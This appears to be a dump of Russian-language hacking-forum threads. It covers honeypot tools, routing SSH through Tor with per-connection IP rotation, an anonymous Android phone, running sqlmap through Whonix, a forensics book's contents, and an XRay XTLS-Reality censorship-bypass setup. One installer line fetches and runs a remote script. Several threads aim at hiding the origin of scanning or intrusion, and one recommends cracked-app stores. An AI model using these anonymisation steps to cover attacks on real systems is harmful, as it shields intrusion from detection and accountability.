pyrd — инструмент и библиотека для Python 3 позволяющая реализовать атаку MITM против подключающегося к приманке злоумышленника. Позволяет просматривать подключения в режиме реального времени и постфактум.

Электронная почта

SHIVA Spampot — релейная спам-приманка, написанная на Python 3. Состоит из пары Docker-контейнеров, где один — это ресивер — SMTP-сервер, который принимает все отправленные ему электронные письма, а второй — анализатор, который разбирает .eml и файл метаданных и извлекает из писем различные идентификаторы: информацию о получателях, URL-адреса, вложения, тело письма Информация индексируется в Elasticsearch/OpenSearch для более удобного поиска и анализа.

Honey — пакетное решение для борьбы со спамом для Laravel, которое сочетает в себе ханипот, систему блокировки спамерских адресов и reCAPTCHA. Скорее средство активного противодействия спаму, чем инструмент для исследования.

imap-honey — простая IMAP и SMTP-приманка, написанная на Golang.

Mailoney — еще одна SMTP-приманка с базовой функциональностью. Давно не получала крупных обновлений.

Различные веб-приманки

portlurker — утилита для прослушивания портов на Rust с базовым логированием в SQLite.

EoHoneypotBundle — узкоспециализированный ханипот для форм Symfony2. Создает формы с дополнительным скрытым от пользователя полем, которое, тем не менее, находят роботы. Робот заполняет невидимое поле, отправляет форму и выдает себя.

Laravel Application Honeypot — еще одна ловушка для ботов, построенная вокруг невидимого поля для ввода. На этот раз для Laravel. Создает скрытый DIV с полем-приманкой, например, «my_name».

laravel-honeypot — аналогичная Laravel-приманка для спама, отправленного через веб-формы.

django-honeypot — приложение Django, добавляющее поля-приманки в веб-формы.

django-admin-honeypot — поддельный экран входа в Django, который уведомляет о попытках несанкционированного доступа.

Express honeypot — RFI и LFI-приманка для ботов и вредоносных программ, которые сканируют веб-сайты и пытаются загрузить оттуда файлы. Написана на javascript и использует фреймворк Express.

HellPot — приманка, которая генерирует бесконечный поток данных, напоминающих загрузку реального веб-сайта, и отправляет его тем клиентам, которые игнорируют robots.txt. Предполагается, что они будут (страдать) ждать загрузки вечно.

honeyup— ханипот, имитирующий дырявый веб-сайт.

Различные приманки для внутренних сетей

Conpot — еще один проект MushMush Foundation — приманка предназначенная для сбора информации о мотивах и методах злоумышленников, действующих во внутренних сетях промышленных предприятий (АСУ ТП). Написана на Python, имитирует ICS/SCADA, поддерживает Modbus, DNP-IP, SML и другие промышленные протоколы. Дает возможности для настройки приманок, в частности, время их отклика может быть искусственно увеличено, чтобы имитировать работу под постоянной нагрузкой.

Goblin — фишинговый инструмент для блютимминга. Может быть использован в качестве ханипота или средства активного противодействия атаке. Основан на обратном прокси.

hontel — ханипот для службы Telnet. Первоначально разработан для работы в среде Ubuntu/Debian, но его можно адаптировать под любой Linux.

esp-canary — простой датчик, который оповещает об обращениях или сканировании. Предназначен для ESP-8266 или ESP-32, подключается к локальной сети по Wi-Fi, основан на Tomcat.

log4j-honeypot-flask — приманка, сообщающая о том, сканирует ли злоумышленник внутреннюю сеть на наличие log4j CVE-2021-44228.

Токены и хлебные крошки

Honeytoken — это некие фейковые данные, которые можно использовать для обмана и обнаружения хакеров. Это могут быть логины и пароли, номера карт или куски кода. Когда злоумышленники находят и пытаются использовать эти данные, они тем самым выдают себя. Существуют отдельные инструменты для их создания и распространения:

Canarytokens — работает по принципу, напоминающему Tracking Pixel, с помощью которых отслеживают открытие электронных писем. Только канарейка делает то же самое для файлов, запросов к базам данных и многого другого. Это позволяет вам устанавливать ловушки в ваших системах, а не создавать отдельные приманки.

SpaceSiren — менеджер токенов и система оповещения о вторжениях для AWS. Поддерживает высокие нагрузки и позволяет управлять тысячами токенов.

Другие приманки

Сюда попало все, что трудно распределить по другим разделам:

dshield — набор скриптов для настройки Raspberry Pi в качестве сенсора DShield — глобальной системы мониторинга атак на базе журналов брандмауэра. Она получает журналы от добровольцев со всего мира и использует их для анализа глобальных тенденций. Используется в качестве механизма сбора данных для SANS Internet Storm Center (ISC).

ADBHoney — приманка с низким уровнем взаимодействия, которая имитирует устройство Android, на котором запущен серверный процесс Android Debug Bridge (ADB). Может помочь обнаружить вредоносное ПО для Android, развертывающее майнеры на телефонах и смарт-телевизорах.

Fibratus— инструмент для исследования и отслеживания ядра Windows. Он позволяет перехватывать общесистемные события, такие как жизненный цикл процесса, ввод-вывод файловой системы, изменения реестра или сетевые запросы и так далее. Не требует драйверов и стороннего ПО для работы. Потенциально позволяет использовать в качестве приманки с высоким уровнем взаимодействия любую машину на Windows.

vmitools — библиотека, упрощающая мониторинг низкоуровневых сведений о работающей виртуальной машине. Позволяет легко контролировать низкоуровневые детали работы виртуальной машины, просматривая ее память, перехватывая аппаратные события и доступ к регистрам vCPU.

Thug — ханипот с низким уровнем взаимодействия на базе Python. Используется для имитации поведения пользовательских приложений, взаимодействующих с вредоносным контентом. Проще говоря, Thug прикидывается не защищенным браузером. Позволяет изучать атаки на стороне клиента. Реализует гибридный подход, сочетающий статический/динамический анализ угроз.

SentryPeer — ханипот для VoIP АТС. Принимает телефонные звонки от злоумышленников и сохраняет IP-адрес, с которого они пришли, и номер, на который они пытались позвонить.

bluepot — Linux-утилита, написанная на Java и предназначенная для приема и хранения любого вредоносного ПО, отправленного по Bluetooth.

miniprint — приманка-принтер со средним взаимодействием. Выглядит, как стандартный сетевой принтер, который случайно попал в общедоступный интернет. Поддерживает полнофункциональную виртуальную файловую систему, в которой злоумышленники могут читать и записывать файлы и каталоги, сохраняет задания на печать в формате PostScript, ведет журнал.

AntiRansom — это инструмент, способный обнаруживать и останавливать атаки программ-вымогателей с использованием приманок. Сначала Anti Ransom создает случайную папку-приманку с множеством бесполезных случайных документов (Excel, PDF), а затем следит за папкой в ожидании изменений. Когда они обнаружены, AntiRansom пытается определить, какой процесс несет за них ответственность и останавливает его.

сурс : https://habr.com/en/companies/bastion/articles/731172/

Безопасный ssh

ID: 676533bbb4103b69df371ad8
Thread ID: 71165
Created: 2022-08-05T06:23:50+0000
Last Post: 2022-08-15T10:11:57+0000
Author: peacemaker
Prefix: Мануал/Книга
Replies: 3 Views: 699

Установим тор
apt install tor

Установим curl
apt install curl

Теперь изменим конфиг ssh для текущего пользователя
nano ~/.ssh/config

ProxyCommand nc -X 5 -x 127.0.0.1:9050 %h %p

Click to expand...

Теперь любые команды ssh будут сразу проксироваться в тор. Не надо указывать вручную прокси или еще что. Теперь вы точно не ошибетесь и не подключитесь к серверу без прокси.

ВНИМАНИЕ! ЭТО БУДЕТ РАБОТАТЬ ТОЛЬКО ДЛЯ ТЕКУЩЕГО ПОЛЬЗОВАТЕЛЯ. Если вы переключитесь на другого, или сделаете sudo other_user. Там нужно делать такие же настройки в конфиге ssh/

Дальше сделаем, чтобы каждую команду у нас был новый IP, изменяя цепочку тора.
Создаем файл
sudo nano /usr/local/bin/tor-new-ip

Bash:Copy to clipboard

#!/bin/bash # Text color variables txtund=$(tput sgr 0 1) # Underline txtbld=$(tput bold) # Bold bldred=${txtbld}$(tput setaf 1) # red bldblu=${txtbld}$(tput setaf 4) # blue bldwht=${txtbld}$(tput setaf 7) # white bldgrn=${txtbld}$(tput setaf 2) # green txtrst=$(tput sgr0) # Reset URL="ipinfo.io/ip" OLD_IP=$(torsocks curl --silent $URL) echo "Old ip : $bldred$OLD_IP$txtrst"; echo "Generate new IP"; echo -e 'AUTHENTICATE "123"\r\nsignal NEWNYM\r\nQUIT' | nc 127.0.0.1 9051; echo "Waiting..."; sleep 5; NEW_IP=$(torsocks curl --silent $URL) echo "New IP generated : $bldgrn$NEW_IP$txtrst";

Выдаем права на запуск
sudo chmod +x /usr/local/bin/tor-new-ip

Где 123 это пароль от tor control. Прочитать как установить его, можно тут.

http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/69857/

создаем новую команду tssh
sudo nano /usr/local/bin/tssh

Bash:Copy to clipboard

#!/bin/bash tor-new-ip ssh $1

Выдаем права на файл
sudo chmod +x /usr/local/bin/tssh

Теперь вместо ssh IP команды мы можем использовать команду tssh IP и при каждом подключении. У вас будет новый IP из сети тор. Удачи вам и анонимности

P.S. Если интересно, могу опубликовать более расширенную версию скрипта, где можно передавать и параметры.

Пробуем сделать анонимный телефон

ID: 676533bbb4103b69df3719dd
Thread ID: 101935
Created: 2023-11-09T14:43:21+0000
Last Post: 2023-11-25T13:15:18+0000
Author: Darksides14
Prefix: Статья
Replies: 2 Views: 695

Телефон — это та вещь, которая с вами постоянно. Она знает что вы говорите во сне, знает что вы делали 5 минут. Она знает больше, чем вы сами. Само устройство не нацелено на анонимность, но мы попытаемся создать "изоляцию". Наша цель: настроить девайс так, чтобы ни единый байт не уходит в Интернет без вашего согласия. Мы разберём как удалить Google который шлёт по 100 запросов на свои сервера в минуту (и нет, я не шучу, это действительно так). Альтернативы удалённых приложений, шифрование данных, смена параметров устройства и т.д.

Получение Root прав

Рут права = полный контроль над устройством. С помощью их мы сможем удалить то, что не удаляется и получить множество преимуществ, о которых расскажу дальше. Инструкция получения для каждого телефона разная, я не хочу давать вам в этом советы, дабы не повлечь смерть вашего устройства. Я не профессионал в таких делах и рекомендую обратиться к открытым источникам. При моем первом рутировании мне пришлось восстанавливать девайс с режима "кирпича" 3 раза, это было связано с непопулярностью модели устройства, но не беспокойтесь, с условным Xiaomi (самая популярная марка в СНГ) проблем возникнуть не должно. Сверяйте отзывы с источников. С моим Realme все было примерно так, у вас будет аналогичный процесс:

несколько команд в adb -> установка одноразового recovery одной командой -> установка Magisk (менеджер рут прав) одной командой -> форматирование

Отключение сервисов Google

Как я и упомянул в начале, это главный шпион в нашем девайсе. Он по умолчанию "вшит" практически во все телефоны, но мы его заменим. Для корректного удаления вы должны использовать программу "ADB AppControl" и получить "Режим разработчика".

В основном это делается таким образом:

Настройки → О телефоне → Версия → Номер сборки → Нажать 10 раз.

После чего посетите вкладку "Для разработчиков" и включите "Отладку по USB".

К слову, этой же утилитой мы сможем удалять "системный мусор", который идёт в комплекте с телефоном. Я перечислю сервисы которые можно отключить, с моим телефоном ничего не случилось (Realme) и работоспособность сохранилась.

Приложение имеет графический интерфейс и делать на него обзор не вижу смысла. Есть удобная поисковая система в правом верхнем углу, в неё вводите названия приложений, которые я оставил ниже. После чего правой кнопкой мыши нажимаем "Отключить", всё максимально просто и понятно, пример ниже:

Внимание, вы должны именно отключить! Не удаляйте эти приложения, если что-то будет не так, вы сможете включить их обратно в программе. Делайте это на свой страх и риск, у всех разные телефоны и я не могу утверждать,

что у вас будет все нормально работать после этого!

Список сервисов которые я отключил без последствий:

Print Service Recommendation Service, Настройка устройства Android, Специальные возможности, Сервисы Google Play, Отзывы о Маркете, Речевые сервисы от Google, Цифровое благополучие, Google Services Framework, Google Partner Setup, История местоположений, Заметки Google Keep, Google One Time Init, Carrier Services, Google Assistant, Google Files, Ассистент, Календарь, YouTube, Карты, Фото, Lens, GPay, Google, Gmail.

Удаляем системный мусор

Практически все Android устройства "отбивают" свою низкую цену используя встраивание рекламы в свою оболочку, которая ставит под угрозу нашу конфиденциальность. У нас есть два пути: использовать тот же ADB AppControl или же сторонние .apk на телефоне. Я покажу два метода, выбирайте то, что вам будет удобней.

Метод через ADB

Производим поиск "нежелательных" приложений используя соответствующую кнопку (см. скриншот), выбираем уровень проверки: Базовый. После сканирования мы увидим то, что можно удалить в два клика. Также советую ввести в поиске запрос: "partner", он покажет вам установщики партнерских компаний, которые нам в устройстве будут лишними.

Метод через SD MAIN

Это стороннее приложение которое так же может найти ненужные нам приложения. Оно платное. Для работы требуются ROOT права, можно использовать как "чистильщик системы".

Лучшим решением будет использовать два этих приложения, дабы не упустить какую-то мелочь, которая в дальнейшем может сыграть большую роль.

Отключаем отправку ошибок и прочее

Оболочки могут легально отправлять ваши полные данные об устройстве и действиях себе на сервера.

Очевидно, что делится мы с ними не собираемся, поэтому повторяем действия ниже:

переходим в настройки -> конфиденциальность -> убираем все галочки, связанные с "тестированием, ошибками" и др.

У разных оболочках есть свои нюансы на эту тему, поэтому посидите минут 10, настройте нормально телефон и по пути убирайте соглашения. Как вариант: обратиться к Интернету, дабы узнать о "подводных камнях" вашей оболочки, обычно на такие темы есть даже видео. Также выключаем обновления системы, оно пингует свои сервера каждый час и может негативно повлиять на наше рутированое устройство в случае обновления. Я упрощу вам работу и оставлю нормальные видео на эту тему.
→ MIUI, RealmiUI ←
Отключаем фоновые процессы и доступ им к Интернету

В каждой системе есть то, что удалять категорически нельзя, поэтому будем действовать по другому — отключать таким приложениям доступ в сеть и работу в фоновом режиме. Для начала переходим во вкладку "Для разработчиков", находим параметры, как на скриншоте ниже. Дублируем в точности мои настройки.

После этого мы можем ограничить доступ в сеть. Ищем банальные приложения по типу "Настройки, Проверка обновлений, Галерея, Телефон, Лаунчер" да и вообще все то, что установила система. Переходим в меню управления приложениями и убираем галочки "Доступ к сети". Если ваш телефон не обладает подобным функционалом, это можно сделать в adb.

В моем телефоне оно работает примерно по такому принципу:

Настройки: я не смог отправить данные, камера, можешь меня подменить?

Click to expand...

Камера: сейчас, я проверю сеть, вдруг какая-то ошибка..

Click to expand...

// Пингует свой сервер дабы понять, рабочий ли он. //

Click to expand...

Камера: О! А у меня есть доступ. Какие данные ты хотел отправить?

Click to expand...

Поэтому, не стоит разрешать доступ к тому, в чем приложение не нуждается.

Если есть такая возможность, устанавливайте "Экономию трафика", это запретит использовать фоновым приложениям доступ к Интернету. Минусы: мессенджеры будут отправлять сообщения с задержкой или вообще не будут.

Проверяем итог работы
Скачиваем PacketCapture (приложение, которое смотрит весь трафик) и запускаем процесс дебага. Нам нужно оставить телефон в таком положении на час, дабы увидеть остались ли "жучки" в системе, которые используют Интернет без нашего ведома. Если такие нашлись — отключаем им сеть, если нет — продолжаем читать дальше. При правильной работе у вас не должно быть ни одного фонового запроса. При каждой установке новых приложений не забывайте запрещать работу в фоне, отключать пассивный трафик. На этом закончим этап конфиденциальности, перейдём к настройке сёрфинга, альтернативах Google и более глубоким утилитам для анонимизации нашего устройства.

Альтернативы PlayMarket

В сети полно аналогов которые предлагают сразу даже взломанные версии приложений, я выделю только основные:

Не забываем отключать им фоновую работу!

AppGallery - магазин официальных приложений созданный под телефоны Huawei, но работает на других марках.

Uptdown App Store - присутствуют кряки игр, программ. Большой ассортимент, есть почти все.

APK Done - убогое приложение, но есть много кряков. Не советую скачивать, лучше сделать ярлык сайта на рабочем столе.

Совет: не устанавливайте приложения по типу "Pinterest" и те, которые можно использовать в браузере. Вам достаточно создать ярлык на сайт и он будет работать как приложение. Так вы сможете сохранить свой IP в безопасности, об правильной настройке браузера расскажу ниже..

Как мне оплачивать через NFC без Google Pay?

Ответ прост. Использовать аналоги. Есть кошелёк от Huawei который работает со многими банками. Можно вырезать чип карты и засунуть под чехол / просто использовать карту в физическом экземпляре. А лучше вообще их не использовать, они хранят ваш цифровой след в виде передвижений как минимум. Переходите на наличку и чувствуйте себя в безопасности, так ваш фиат не будет заблокирован каким-то банком который обвиняет вас в необоснованном доходе.

Альтернатива звонилки

На новых Andoid поставили звонилку от Google, которая даже записывать разговор не разрешает:/ Исправим! Есть такое приложение как TruePhone, настоящий боевой аппарат который даже покажет вышку города с которой вам звонят. Естественно, есть запись звонков, blacklist и прочие настроечки. Интерфейс полностью редактируется, можно создать свой дизайн.

пользовал эту звонилку до тех пор, пока не получилось поставить оригинальную от Realme (UI 2.0), она очень приятная в интерфейсе и имеет аналогичные функции, встает только на оболочку RealmeUI.

Если у вас телефон этой марки — ставьте её, лучше не найдёте.

UDP, IPv6 трафик в Whonix

ID: 676533bbb4103b69df371c24
Thread ID: 49146
Created: 2021-03-09T20:36:32+0000
Last Post: 2021-03-10T06:39:40+0000
Author: qbs
Replies: 1 Views: 694

Здравствуйте.
Где-то на форуме видел что UDP, IPv6 трафик который идет из виртуальной машины в шлюз Whonix, игнорируется и отправляется в открытом виде минуя тор, тем самым палит ип.
Так ли это? Если да, то как это исправить? И почему это не исправлено самим Whonix?
Заранее спасибо!

sqlmap через тор

ID: 676533bbb4103b69df371bb2
Thread ID: 54871
Created: 2021-08-05T10:02:33+0000
Last Post: 2021-08-30T08:05:21+0000
Author: Linuz
Replies: 6 Views: 693

Если я запущу какой-либо сканер уязвимостей на kali Linux, подключенной к whonix getaway, то вероятность передачи трафика напрямую, с моего ip равна 0, верно?

pia сдох | замена

ID: 676533bbb4103b69df371a07
Thread ID: 97801
Created: 2023-09-11T08:38:22+0000
Last Post: 2023-09-17T18:15:07+0000
Author: D4nte
Replies: 11 Views: 691

Привет, в последнее время столкнулся с проблемой что шлюзы pia vpn РКН постоянно блочат на сегодня уже окончательно, не подключений ни ничего, доступ к сайту есть но подключений никак, есть замена данному впн?, который мог подключаться из ~~кореии~~ =россии.

Muhiballah Mohammed. Windows Forensics Analyst Field Guide [2023] eng

ID: 676533bbb4103b69df371940
Thread ID: 114506
Created: 2024-05-14T08:53:00+0000
Last Post: 2024-08-08T12:16:28+0000
Author: handersen
Prefix: Мануал/Книга
Replies: 2 Views: 690

Приличная книга по форензике ОС Windows.

Скачать с LibGen PDF или c rutracker PDF

EPUB.

Spoiler: Оглавление

Part 1: Windows OS Forensics and Lab Preparation
Charter 1. Introducing the Windows OS and Filesystems and Getting Prepared for the Labs .. 3
Technical requirements ................................................................... 4
What is a Microsoft OS? .................................................................. 4
The modern Windows OS and filesystems .................................................... 8
Windows XP ............................................................................... 8
Windows Vista ............................................................................ 9
Windows 7, 8 and 8.1 .................................................................... 10
Windows 10 .............................................................................. 11
Digital forensics and common terminology ............................................... 12
What is digital forensics? .............................................................. 12
Digital forensic terminology ............................................................ 15
The process of digital forensics ........................................................ 17
Digital evidence ........................................................................ 18
Windows VSS ............................................................................. 21
Preparing a lab environment ............................................................. 23
Summary ................................................................................. 37
Questions ............................................................................... 37
Charter 2. Evidence Acquisition ......................................................... 39
Technical requirements .................................................................. 39
An overview of evidence acquisition for Windows OS ...................................... 40
A forensic analyst’s jump bag (first responder kit) ..................................... 42
Understanding the order of volatility ................................................... 43
Acquisition tools for Windows OS ........................................................ 45
Using FTK Imager ........................................................................ 46
Using KAPE .............................................................................. 53
Additional tools ........................................................................ 60
Evidence collection and acquisition exercise ............................................ 63
Summary ................................................................................. 64
Charter 3. Memory Forensics for the Windows OS .......................................... 65
Technical requirements .................................................................. 66
Understanding memory forensics concepts and techniques .................................. 66
Some techniques to overcome the challenges .............................................. 67
Why memory forensics is important ....................................................... 68
Exploring the main components of Windows ................................................ 68
The kernel .............................................................................. 68
Windows processes ....................................................................... 69
Windows services ........................................................................ 71
Device drivers .......................................................................... 71
DLLs .................................................................................... 72
The registry ............................................................................ 72
The filesystem .......................................................................... 73
Investigation methodology ............................................................... 74
Understanding Windows architecture ...................................................... 75
Looking at the memory acquisition tools ................................................. 76
Using FTK Imager to capture memory ...................................................... 76
WinPmem ................................................................................. 79
DumpIt .................................................................................. 83
Belkasoft RAM Capturer .................................................................. 85
MAGNET RAM Capture ...................................................................... 87
Using Volatility to analyze memory dumps and plugins .................................... 89
Volatility architecture ................................................................. 90
Volatility plugins ...................................................................... 90
Volatility commands ..................................................................... 90
Identifying the profile ................................................................. 92
The imageinfo plugin .................................................................... 93
The process list and tree ............................................................... 93
The netscan plugin ...................................................................... 95
The hivescan and hivelist plugins ....................................................... 96
A brief overview of Volatility 3 ........................................................ 98
Evidence collection and acquisition exercise ........................................... 102
Summary ................................................................................ 102
Charter 4. The Windows Registry ....................................................... 103
Technical requirements ................................................................. 104
Windows Registry fundamentals .......................................................... 104
Why do we care about the Windows Registry? ............................................. 104
Components of the Windows Registry ..................................................... 106
Windows Registry hierarchy ............................................................. 107
Windows Registry hives ................................................................ 108
HKLM ................................................................................... 109
HKCU ................................................................................... 110
HKCR ................................................................................... 112
Windows Registry data types ............................................................ 114
User registry hives .................................................................... 115
NTUSER.DAT ............................................................................. 116
UsrClass.dat .......................................................................... 117
Windows Registry acquisition and analysis ............................................. 118
regedit.exe and reg.exe ................................................................ 119
powershell.exe ........................................................................ 121
Windows Registry acquisition ........................................................... 122
Windows Registry analysis tools ....................................................... 127
Registry Explorer ...................................................................... 127
RegRipper .............................................................................. 130
Registry Viewer ........................................................................ 136
RECmd.exe .............................................................................. 138
Windows Registry forensic analysis exercises ........................................... 140
Summary ................................................................................ 140
Charter 5. User Profiling Using the Windows Registry ................................... 141
Profiling system details ............................................................... 141
Identifying the OS version ............................................................. 142
Identifying CurrentControlSet .......................................................... 144
Validating the computer name ........................................................... 145
Identifying time zones ................................................................. 146
Identifying services ................................................................... 147
Installed applications ................................................................. 150
The PrefetchParameters subkey .......................................................... 151
Network activities ..................................................................... 152
Autostart registry keys ................................................................ 154
Profiling user activities .............................................................. 156
SAM registry hive ...................................................................... 157
Domain and local user details .......................................................... 159
NTUSER.DAT ............................................................................. 160
The RecentDocs key ..................................................................... 160
The TypedPaths key ..................................................................... 162
The TypedURLs subkey ................................................................... 163
User profiling using Windows Registry exercises ........................................ 164
Summary ................................................................................ 164
Part 2: Windows OS Additional Artifacts
Charter 6. Application Execution Artifacts ............................................. 167
Technical requirements ................................................................. 168
Windows evidence of execution artifacts ................................................ 168
Looking at the NTUSER.DAT, Amcache, and SYSTEM hives ................................... 171
Understanding and analyzing UserAssist ................................................. 172
Background Activity Moderator (BAM) .................................................... 175
Shimcache .............................................................................. 176
Amcache.hve ............................................................................ 178
RunMRU ................................................................................. 179
LastVisitedPidlMRU ..................................................................... 180
Windows Prefetch ....................................................................... 181
Application execution artifact exercises ............................................... 186
Summary ............................................................................... 187
Charter 7. Forensic Analysis of USB Artifacts .......................................... 189
Technical requirements ................................................................. 190
Overview of USB devices and types ...................................................... 190
Understanding stored evidence on USB devices ........................................... 191
Analyzing USB artifacts ................................................................ 192
Identifying the USB device type, product, and vendor ID ................................ 194
Identifying the volume serial number ................................................... 197
Identifying the volume name and letter ................................................. 198
Using the USBDeview tool ............................................................. 199
Exploring a real-world scenario of identifying the root cause .......................... 201
USB artifacts analysis exercises ....................................................... 205
Summary ................................................................................ 205
Charter 8. Forensic Analysis of Browser Artifacts ..................................... 207
Technical requirements ................................................................. 208
Overview of browsers ................................................................... 208
Internet Explorer ...................................................................... 209
Microsoft Edge ......................................................................... 211
Google Chrome .......................................................................... 212
Chrome artifacts ....................................................................... 213
Firefox ................................................................................ 217
Browser forensics exercises ............................................................ 222
Summary ................................................................................ 223
Charter 9. Exploring Additional Artifacts .............................................. 225
Technical requirements ................................................................. 226
Email forensic analysis .............................................................. 226
Types of phishing emails ............................................................... 227
Email header analysis ................................................................. 227
Analyzing Outlook emails ............................................................... 236
Event log analysis ................................................................... 239
Security event logs .................................................................... 241
Application event logs ................................................................ 243
Analyzing $MFT ......................................................................... 244
MFTEcmd.exe ............................................................................ 248
LNK file analysis ...................................................................... 251
Recycle Bin analysis .................................................................. 257
ShellBags and jump lists ............................................................... 261
System Resource Utilization Monitor (SRUM) ............................................. 266
Case study – analyzing malware infections .............................................. 270
Analysis .............................................................................. 270
Belksoft Live RAM Capturer ............................................................. 270
KAPE ................................................................................... 271
Additional forensic artifacts exercises ................................................ 283
Summary ................................................................................ 283

Настраиваем сервер и клиент XRay с XTLS-Reality (обход блокировок с полной маскировкой)

ID: 676533bbb4103b69df371a22
Thread ID: 95407
Created: 2023-08-10T22:45:15+0000
Last Post: 2023-08-24T07:38:23+0000
Author: baykal
Prefix: Статья
Replies: 2 Views: 672

В серии предыдущих статей я описывал, почему повсеместно используемые VPN- и прокси-протоколы такие как Wireguard и L2TP очень уязвимы к выявлению и могут быть легко заблокированы цензорами при желании, обозревал существующие гораздо более надежные протоколы обхода блокировок, клиенты для них, а также описывал настройку сервера для всего этого.

Но кое о чем мы не поговорили. Во второй статье я вскользь упомянул самую передовую и недетектируемую технологию обхода блокировок под названием XTLS- Reality , и пришло время рассказать о ней поподробнее, а именно - как настроить клиент и сервер для нее.

Кроме того, что этот протокол еще более устойчив к выявлению, приятным фактом будет и то, что настройка сервера XRay для XTLS-Reality гораздо проще, чем описанные ранее варианты - после предыдущих статей я получил довольно много комментариев типа "А что так сложно, нужен домен, нужны сертификаты, и куча всего" - теперь все будет гораздо проще.

XTLS-Reality

Коротко про XTLS-Reality. Это самое новое изобретение от авторов XRay. Про XRay (и его прородителя V2Ray, он же V2Fly) я рассказывал в предыдущей статье. XTLS-Reality поддерживается в последних релизах XRay, Sing-box и многих клиентах.

Он предназначен для защиты от выявления методом active probing. В отличие от старых протоколов (Shadowsocks, VMess, VLESS, и транспорта XTLS-Vision), определение “свой/чужой” здесь происходит еще на этапе TLS-хендшейка в момент чтения ClientHello. Если клиент опознан как “свой”, сервер работает как прокси, а если нет - вжух! - и TLS подключение передается на какой-нибудь другой абсолютно реальный хост с TLS (например, google.com или gosuslugi.ru), и таким образом клиент (или цензор, желающий методом active probing проверить, а что же прячется на том конце) получит настоящий TLS-сертификат от google.com или gosuslugi.ru и настоящие данные с этого сервера. Полное соответствие. Механизм определения "свой/чужой" во многом схож с механизмом работы Cloak, и позволяет достоверно определить подлинность клиента, но вместе с тем не вызывает подозрения у цензоров и устойчив к replay-атакам - со стороны систем анализа трафика это выглядит как подключение к настоящему популярному сайту, сервер отдает настоящий TLS-сертификат этого сайта, и вообще все (включая TLS fingerprint сервера) выглядит до предела аутентично и не вызывает подозрений. Еще XTLS-Reality может оказаться вариантом для обхода суровых корпоративных прокси с Man-in-the-Middle, которые перешифровывают весь трафик из сети своим сертификатом (нередко подобные прокси имеют список исключений для ресурсов с HSTS и certificate pinning, либо для экономии ресурсом, и подобрав правильный домен можно пролезть во внешнюю сеть без расшифровки трафика). Бонусом еще XTLS-Reality обычно используется в паре с XTLS-Vision, то есть мы имеем очень достоверно выглядящие паттерны трафика из-за отсуствия двойного шифрования TLS-in-TLS (и заодно еще очень высокую производительность, у меня между хостами в Москве и в центральной Европе XRay легко выдает >100 мегабит).

Единственный минус подобного решения - в отличие от более старых протоколов (VLESS без XTLS) нет возможности работать через websocket-транспорт, и, соответственно, через CDN типа Cloudflare. Upd : такая возможность есть если использовать многоуровневую схему с SNI-proxy (типа haproxy), при необходимости расскажу в комментариях.

Установка сервера XRay

А теперь настало время все это настроить. Дано: VPS на Linux (Debian или Ubuntu, на других дистрибутивах плюс-минус то же самое) с IPv4 или IPv6-адресом.

Установку XRay и уже описывал в предыдущей статье, поэтому здесь буду краток.

Можно установить XRay руками:

Code:Copy to clipboard

wget https://github.com/XTLS/Xray-core/releases/download/v1.8.1/Xray-linux-64.zip mkdir /opt/xray unzip ./Xray-linux-64.zip -d /opt/xray chmod +x /opt/xray/xray nano /usr/lib/systemd/system/xray.service systemctl enable xray

xray.service

Code:Copy to clipboard

[Unit] Description=Xray Service Documentation=https://github.com/xtls After=network.target nss-lookup.target [Service] User=nobody CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE NoNewPrivileges=true ExecStart=/opt/xray/xray run -config /opt/xray/config.json Restart=on-failure RestartPreventExitStatus=23 LimitNPROC=10000 LimitNOFILE=1000000 [Install] WantedBy=multi-user.target

А можно установить скриптом от разработчиков (почему-то по умолчанию он ставит старую версию 1.7.5, которая не поддерживает Reality, поэтому нужно явно указать более свежую):

Code:Copy to clipboard

bash -c "$(curl -L https://raw.githubusercontent.com/XTLS/Xray-install/046d9aa2432b3a6241d73c3684ef4e512974b594/install-release.sh)" @ install --version 1.8.1

Скрипт установит XRay и создаст для него systemd-юнит.

Настройка сервера XRay

Для настройки нам понадобится ряд параметров. Часть из них нам может сгенерировать сам XRay:

Code:Copy to clipboard

/usr/local/bin/xray uuid # /opt/xray/xray если устанавливали вручную /usr/local/bin/xray x25519 # /opt/xray/xray если устанавливали вручную

На выходе вы получите UUID (идентификатор пользователя для протокола аутентификации VLESS), а также приватный и публичный ключи - запишите их, они вам понадобятся.

Еще один параметр, который нужен - short ID, он представляет собой просто шестнадцатиричное число (символы 0-9, a-g) длиной до 8 байт (16 символов) - можно набрать любую абракадабру типа "aabbccdd" или запустить openssl rand -hex 8

А вот дальше начинается самое интересное. Нам нужно найти сайт, под который мы будем маскироваться.

Требования довольно простые:

это должен быть иностранный сервер (вне РФ), не забаненный по домену Роскомнадзором, поддерживающий подключения по TLSv1.3 и HTTP/2, имеющий заглавную страницу, которая не переадресовывает на какой-нибудь другой домен. Если совсем упарываться, то неплохо было бы если бы IP-адрес был из диапазона того же облачного хостера, что и у вас, и чтобы сервер поддерживал Online Certificate Status Protocol (OCSP). Если вы не знаете, что вся эта фигня значит - не заморачивайтесь, выбирайте что-нибудь простое, например

www.samsung.com:443

www.googletagmanager.com:443

www.asus.com:443

www.amd.com:443

www.cisco.com:443

www.microsoft.com:443

dl.google.com:443

www.linksys.com:443

www.nvidia.com:443
и т.д.

Сервер выбрали, настало время редактировать конфиг. Если вы ставили XRay вручную то он будет лежать в /opt/xray/config.json, если скриптом - то в /usr/local/etc/xray/config.json.

Приводим его к следующему виду:

Code:Copy to clipboard

